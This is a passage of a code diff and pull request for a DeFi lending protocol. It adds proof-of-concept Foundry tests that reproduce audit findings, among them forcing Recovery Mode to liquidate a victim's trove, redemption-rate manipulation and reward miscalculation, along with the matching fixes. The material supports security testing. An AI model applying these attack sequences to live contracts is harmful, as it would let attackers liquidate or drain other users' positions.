+  //     // Step 2: Perform redemption
+  //     uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
+  //     _redeemCollateral(sbtcTroveManager, redemptionAmount);
+
+  //     uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
+  //     console.log("Redemption Rate: %18e%", redemptionRate);
+  //   }
+
+  //   /**
+  //    * @dev Test case: Redemption with debt inflation
+  //    */
+  //   function test_poc_redemptionWithDebtInflation() public {
+  //     vm.startPrank(attacker);
+
+  //     // Step 1: Open a trove
+  //     uint256 debtAmount = 100_000e18;
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+  //     // Step 2: Attacker2 opens a large trove to inflate total debt
+  //     vm.startPrank(attacker2);
+  //     uint256 largeDebtAmount = 500_000e18; // 0.5M DEBT
+  //     _openTrove(sbtcTroveManager, largeDebtAmount, 3e18);
+
+  //     // Step 3: Perform redemption
+  //     vm.startPrank(attacker);
+  //     uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
+  //     _redeemCollateral(sbtcTroveManager, redemptionAmount);
+
+  //     // Step 4: Attacker2 closes their large trove
+  //     vm.startPrank(attacker2);
+  //     borrowerOps.closeTrove(sbtcTroveManager, attacker2);
+
+  //     uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
+  //     console.log("Manipulated Redemption Rate: %18e%", redemptionRate);
+  //   }
+
+  //   /**
+  //    * @dev Test case: Stork Oracle stale price
+  //    */
+  //   function test_poc_storkOracleStalePrice() public {
+  //     vm.startPrank(users.owner);
+
+  //     // Create mock Stork Oracle and wrapper
+  //     MockStorkOracle mockOracle = new MockStorkOracle();
+  //     StorkOracleWrapper wrapper = new StorkOracleWrapper(address(mockOracle), bytes32(0));
+
+  //     // Set initial price to $60,000
+  //     mockOracle.set(uint64(block.timestamp * 1e9), 60000 * 1e18);
+
+  //     // Configure price feed to use the Stork Oracle wrapper
+  //     priceFeed.setOracle(address(stakedBTC), address(wrapper), 80000, bytes4(0), 8, false);
+
+  //     uint256 btcPrice = priceFeed.fetchPrice(address(stakedBTC));
+  //     console.log("Price before fluctuation =", btcPrice);
+
+  //     // Simulate time passing (1 second)
+  //     vm.warp(block.timestamp + 1);
+
+  //     // Update oracle price to $50,000
+  //     mockOracle.set(uint64(block.timestamp * 1e9), 50000 * 1e18);
+
+  //     btcPrice = priceFeed.fetchPrice(address(stakedBTC));
+  //     console.log("Price after fluctuation (should be stale) =", btcPrice);
+  //   }
+
+  /**
+   * @dev Test case: Stability Pool emptied by liquidation return incorrect claimable amount
+   */
+  function test_poc_stabilityPool_inaccurateClaimableAmount() public {
+    address user = users.user1;
+    address user2 = users.user2;
+    deal(address(stakedBTC), user, 1_000_000e18);
+    deal(address(stakedBTC), user2, 1_000_000e18);
+
+    // Mock Babel Vault's allocateNewEmissions function for demonstration purposes
+    vm.mockCall(
+      address(babelVault),
+      abi.encodeWithSelector(IBabelVault.allocateNewEmissions.selector),
+      abi.encode(100e18 * 86400 * 7) // 100 tokens per week
+    );
+
+    // Step 1: User opens a trove
+    vm.startPrank(user);
+    uint256 debtAmount = 50_000e18; // 50,000 DEBT
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+    // Step 2: User deposits all borrowed DEBT into Stability Pool
+    stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
+
+    uint256 stabilityPoolBalanceBefore = stabilityPool.getTotalDebtTokenDeposits();
+    console.log("Stability Pool balance before liquidation:", stabilityPoolBalanceBefore);
+
+    vm.startPrank(user2);
+    debtAmount = stabilityPoolBalanceBefore;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+    // Step 3: Simulate price drop to make the trove undercollateralized
+    vm.warp(block.timestamp + 1);
+    _updateOracle(59_000e8);
+
+    // Step 4: Triggers liquidation
+    liquidationMgr.liquidate(sbtcTroveManager, user2);
+
+    // Step 5: Check Stability Pool balance after liquidation
+    uint256 stabilityPoolBalanceAfter = stabilityPool.getTotalDebtTokenDeposits();
+    console.log("Stability Pool balance after liquidation:", stabilityPoolBalanceAfter);
+
+    // Assert that the Stability Pool is emptied
+    assertEq(stabilityPoolBalanceAfter, 0, "Stability Pool should be empty after liquidation");
+    //
+    // Step 6: Check claimable rewards
+    // The correct amount should be more than zero
+    uint256 claimableRewards = stabilityPool.claimableReward(user);
+    console.log("Claimable rewards:", claimableRewards);
+
+    assertTrue(claimableRewards > 0);
+  }
+
+  //   function test_poc_stabilityPool_incorrectMarginalBabelGain() public {
+  //     address user = users.user1;
+  //     address user2 = users.user2;
+  //     address user3 = makeAddr("User3");
+  //     deal(address(stakedBTC), user, 1e6 * 1e18);
+  //     deal(address(stakedBTC), user2, 1e6 * 1e18);
+  //     deal(address(stakedBTC), user3, 1e6 * 1e18);
+
+  //     // Mock Babel Vault's allocateNewEmissions function for demonstration purposes
+  //     vm.mockCall(
+  //       address(babelVault),
+  //       abi.encodeWithSelector(IBabelVault.allocateNewEmissions.selector),
+  //       abi.encode(100e18 * 86400 * 7) // 100 tokens per week
+  //     );
+
+  //     // Step 1: User opens a trove
+  //     vm.startPrank(user);
+  //     uint256 debtAmount = 50000e18; // 50,000 DEBT
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+  //     // Step 2: User deposits all borrowed DEBT into Stability Pool
+  //     stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
+
+  //     uint256 stabilityPoolBalanceBefore = stabilityPool.getTotalDebtTokenDeposits();
+  //     console.log("Stability Pool balance before liquidation:", stabilityPoolBalanceBefore);
+
+  //     vm.startPrank(user2);
+  //     debtAmount = stabilityPoolBalanceBefore;
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+  //     // Step 3: Simulate price drop to make the trove undercollateralized
+  //     vm.warp(block.timestamp + 1);
+  //     _updateOracle(59000 * 1e8);
+
+  //     // Step 4: Triggers liquidation
+  //     liquidationMgr.liquidate(sbtcTroveManager, user2);
+
+  //     // Step 5: Check Stability Pool balance after liquidation
+  //     uint256 stabilityPoolBalanceAfter = stabilityPool.getTotalDebtTokenDeposits();
+  //     console.log("Stability Pool balance after liquidation:", stabilityPoolBalanceAfter);
+
+  //     // Assert that the Stability Pool is emptied
+  //     assertEq(stabilityPoolBalanceAfter, 0, "Stability Pool should be empty after liquidation");
+
+  //     // Step 6: Check claimable rewards
+  //     // The correct amount should be more than zero
+  //     uint256 claimableRewards = stabilityPool.claimableReward(user);
+  //     console.log("User claimable rewards:", claimableRewards);
+
+  //     // Step 7: User2 opens a trove and deposits into Stability Pool
+  //     vm.startPrank(user2);
+  //     debtAmount = 10000e18;
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+  //     stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
+
+  //     // Step 8: User3 opens a trove
+  //     vm.startPrank(user3);
+  //     debtAmount = 2000e18;
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
+  //     // Step 9: Simulate price drop to make the user3's trove undercollateralized
+  //     vm.warp(block.timestamp + 1);
+  //     _updateOracle(58000 * 1e8);
+
+  //     // Step 10: Triggers liquidation
+  //     liquidationMgr.liquidate(sbtcTroveManager, user3);
+
+  //     // Step 11: Check claimable rewards
+  //     // The correct claimable rewards should be the same as the previous amount as
+  //     // the user's deposit was already emptied in the previous epoch
+  //     claimableRewards = stabilityPool.claimableReward(user);
+  //     console.log("User claimable rewards:", claimableRewards);
+  //   }
+}

--- a/test/foundry/poc.t.sol
+++ b/test/foundry/poc.t.sol
@@ -167,48 +167,51 @@ contract PoCTest is TestSetup {
     console.log("TCR =", borrowerOps.getTCR());
   }
 
-  //   /**
-  //    * @dev Test case: Forcing the system into Recovery Mode
-  //    */
-  //   function test_poc_forcingSystemIntoRecoveryMode() public {
-  //     // Step 1: Victim opens a trove with ICR lower than CCR
-  //     vm.startPrank(victim);
-  //     _openTrove(sbtcTroveManager, 100000e18, 2e18);
+  /**
+   * @dev Test case: Forcing the system into Recovery Mode
+   */
+  function test_poc_forcingSystemIntoRecoveryMode() public {
+    console.log("Initial TCR:");
+    _printTCR();
 
-  //     // Step 2: Attacker opens a minimal position with CR slightly above 225%
-  //     vm.startPrank(attacker);
-  //     _openTrove(sbtc2TroveManager, 2000e18, 2.26e18);
+    // Step 1: Victim opens a trove with ICR lower than CCR
+    vm.startPrank(victim);
+    _openTrove(sbtcTroveManager, 100_000e18, 2e18);
 
-  //     // Step 3: Open a large position to bring TCR to exactly 225%
-  //     (uint256 totalPricedCollateral, uint256 totalDebt) = borrowerOps.getGlobalSystemBalances();
-  //     uint256 debtAmount = ((totalPricedCollateral - (225 * totalDebt * 1e18) / 100) * 100) / (225 - 200) / 1e18;
-  //     uint256 CR = 2e18;
-  //     _openTrove(sbtcTroveManager, debtAmount, CR);
+    // Step 2: Attacker opens a minimal position with CR slightly above 225%
+    vm.startPrank(attacker);
+    _openTrove(sbtc2TroveManager, 2_000e18, 2.26e18);
 
-  //     console.log("TCR after opening large position:");
-  //     _printTCR();
+    // Step 3: Open a large position to bring TCR to exactly 225%
+    (uint256 totalPricedCollateral, uint256 totalDebt) = borrowerOps.getGlobalSystemBalances();
+    uint256 debtAmount = ((totalPricedCollateral - (225 * totalDebt * 1e18) / 100) * 100) / (225 - 200) / 1e18;
+    uint256 CR = 2e18;
+    _openTrove(sbtcTroveManager, debtAmount, CR);
 
-  //     // Step 4: Redeem the position opened in step 2 to trigger Recovery Mode
-  //     (, uint256 attackerDebt) = sbtc2TroveManager.getTroveCollAndDebt(attacker);
-  //     uint256 redemptionAmount = attackerDebt - INIT_GAS_COMPENSATION; // 200e18 is the gas compensation
-  //     _redeemCollateral(sbtc2TroveManager, redemptionAmount);
+    console.log("TCR after opening large position:");
+    _printTCR();
 
-  //     console.log("TCR after redemption (should be in Recovery Mode):");
-  //     _printTCR();
+    // Step 4: Redeem the position opened in step 2 to trigger Recovery Mode
+    (, uint256 attackerDebt) = sbtc2TroveManager.getTroveCollAndDebt(attacker);
+    uint256 redemptionAmount = attackerDebt - INIT_GAS_COMPENSATION; // 200e18 is the gas compensation
+    _redeemCollateral(sbtc2TroveManager, redemptionAmount);
 
-  //     // Step 5: Liquidate victim's trove (CR < 225%)
-  //     liquidationMgr.liquidate(sbtcTroveManager, victim);
+    console.log("TCR after redemption (should be in Recovery Mode):");
+    _printTCR();
 
-  //     console.log("Victim's trove liquidated");
+    // Step 5: Liquidate victim's trove (CR < 225%)
+    liquidationMgr.liquidate(sbtcTroveManager, victim);
 
-  //     // Verify victim's trove is closed
-  //     (uint256 victimColl, uint256 victimDebt) = sbtcTroveManager.getTroveCollAndDebt(victim);
-  //     assertEq(victimColl, 0, "Victim's trove collateral should be zero");
-  //     assertEq(victimDebt, 0, "Victim's trove debt should be zero");
+    console.log("Victim's trove liquidated");
 
-  //     console.log("Final TCR:");
-  //     _printTCR();
-  //   }
+    // Verify victim's trove is closed
+    (uint256 victimColl, uint256 victimDebt) = sbtcTroveManager.getTroveCollAndDebt(victim);
+    assertEq(victimColl, 0, "Victim's trove collateral should be zero");
+    assertEq(victimDebt, 0, "Victim's trove debt should be zero");
+
+    console.log("Final TCR:");
+    _printTCR();
+  }
 
   //   /**
   //    * @dev Test case: Normal redemption process


### PR DESCRIPTION
[PFE-1]
- Update the `roundId` handling for `StorkOracleWrapper` contract, to avoid delayed price updates in case of price update in less then a minute.
- Add additional tests for validating this fix.

[SPO-1]
- Fixed the calculation of `marginalBabelGain` based on epochs in `StabilityPool`
- The partial fix for `claimableReward` calculation has already been applied in this commit during our previous audit: https://github.com/Bima-Labs/bima-v1-core/commit/0de27a0c172deb1be1c2338cb688d15940caf385
- Fix reward calculation when `totalDebt` or `initialDeposit` is `0`
- Add `poc.t.sol` file.

[TMA-1]
- Fix the calculation of `lastFeeOperationTime` to ensure correct base rate decay calculation